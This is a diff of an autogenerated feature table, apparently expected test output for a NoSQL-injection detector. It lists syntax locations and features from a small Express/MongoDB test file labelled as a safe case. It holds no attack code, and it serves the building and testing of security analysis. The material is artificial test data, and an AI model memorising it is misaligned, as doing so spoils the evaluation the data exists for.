autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:1 | MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:1 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:1 | MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:1 | require | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:13 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:13 | express | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:34 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:34 | express | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:34 | express ... press') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:34 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:7:1:34 | express ... press') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:23 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:23 | require | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:34 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:34 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:34 | exceptional return of require('express') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:34 | require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:34 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:17:1:34 | require('express') | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:25:1:33 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:25:1:33 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:25:1:33 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:25:1:33 | 'express' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:25:1:33 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:25:1:33 | 'express' | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:13 | mongodb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:13 | mongodb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:13 | mongodb | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:34 | mongodb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:34 | mongodb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:34 | mongodb | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:34 | mongodb ... ngodb') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:34 | mongodb ... ngodb') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:7:2:34 | mongodb ... ngodb') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:23 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:23 | require | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:34 | exceptional return of require('mongodb') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:34 | exceptional return of require('mongodb') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:34 | exceptional return of require('mongodb') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:34 | require('mongodb') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:34 | require('mongodb') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:17:2:34 | require('mongodb') | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:25:2:33 | 'mongodb' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:25:2:33 | 'mongodb' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:25:2:33 | 'mongodb' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:25:2:33 | 'mongodb' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:25:2:33 | 'mongodb' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:2:25:2:33 | 'mongodb' | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:16 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:16 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:16 | bodyParser | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:41 | bodyPar ... arser') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:41 | bodyPar ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:41 | bodyPar ... arser') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:41 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:41 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:7:3:41 | bodyParser | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:26 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:26 | require | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:41 | exceptional return of require ... arser') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:41 | exceptional return of require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:41 | exceptional return of require ... arser') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:41 | require ... arser') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:41 | require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:20:3:41 | require ... arser') | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:28:3:40 | 'body-parser' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:28:3:40 | 'body-parser' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:28:3:40 | 'body-parser' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:28:3:40 | 'body-parser' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:28:3:40 | 'body-parser' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:3:28:3:40 | 'body-parser' | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:17 | MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:17 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:17 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:17 | MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:39 | MongoCl ... oClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:39 | MongoCl ... oClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:39 | MongoCl ... oClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:39 | MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:39 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:7:5:39 | MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:21:5:27 | mongodb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:21:5:27 | mongodb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:21:5:27 | mongodb | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:21:5:39 | mongodb.MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:21:5:39 | mongodb.MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:21:5:39 | mongodb.MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:29:5:39 | MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:29:5:39 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:5:29:5:39 | MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:9 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:9 | app | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:21 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:21 | app | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:21 | app = express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:7:7:21 | app = express() | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:19 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:19 | express | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:21 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:21 | exceptional return of express() | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:21 | express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:7:13:7:21 | express() | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:3 | app | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:7 | app.use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:7 | app.use | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:51 | app.use ... lse })) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:51 | app.use ... lse })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:51 | app.use ... lse })) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:51 | exceptional return of app.use ... lse })) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:51 | exceptional return of app.use ... lse })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:1:9:51 | exceptional return of app.use ... lse })) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:5:9:7 | use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:5:9:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:5:9:7 | use | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:18 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:18 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:18 | bodyParser | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:29 | bodyPar ... encoded | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:29 | bodyPar ... encoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:29 | bodyPar ... encoded | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | bodyPar ... alse }) | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | bodyPar ... alse }) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | bodyPar ... alse }) | calleeImports | express | @@ -2011,6 +10876,12 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | bodyPar ... alse }) | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | bodyPar ... alse }) | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | bodyPar ... alse }) | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | exceptional return of bodyPar ... alse }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | exceptional return of bodyPar ... alse }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:9:9:50 | exceptional return of bodyPar ... alse }) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:20:9:29 | urlencoded | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:20:9:29 | urlencoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:20:9:29 | urlencoded | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:31:9:49 | { extended: false } | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:31:9:49 | { extended: false } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:31:9:49 | { extended: false } | calleeImports | body-parser | @@ -2018,6 +10889,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:31:9:49 | { extended: false } | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:31:9:49 | { extended: false } | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:31:9:49 | { extended: false } | receiverName | bodyParser | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:40 | extended | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:40 | extended | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:40 | extended | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:47 | extended: false | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:47 | extended: false | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:47 | extended: false | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:47 | extended: false | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:47 | extended: false | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:33:9:47 | extended: false | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:43:9:47 | false | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:43:9:47 | false | InputAccessPathFromCallee | 0.extended | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:43:9:47 | false | InputArgumentIndex | 0 | @@ -2026,6 +10906,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:43:9:47 | false | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:43:9:47 | false | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:9:43:9:47 | false | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:11:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:11:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:11:3 | app | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:11:8 | app.post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:11:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:11:8 | app.post | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:20:2 | app.pos ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:20:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:20:2 | app.pos ... });\\n}) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:20:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:20:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:1:20:2 | exceptional return of app.pos ... });\\n}) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:5:11:8 | post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:5:11:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:5:11:8 | post | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:10:11:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:10:11:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:10:11:26 | '/documents/find' | calleeImports | express | @@ -2033,6 +10928,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:10:11:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:10:11:26 | '/documents/find' | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:10:11:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:28 | MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:28 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:28 | MongoClient | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:28 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:28 | MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:29 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:29 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:29 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:11:29 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | 'arguments' object of anonymous function | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | (req, r ... });\\n} | calleeImports | express | @@ -2040,11 +10950,125 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | (req, r ... });\\n} | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| 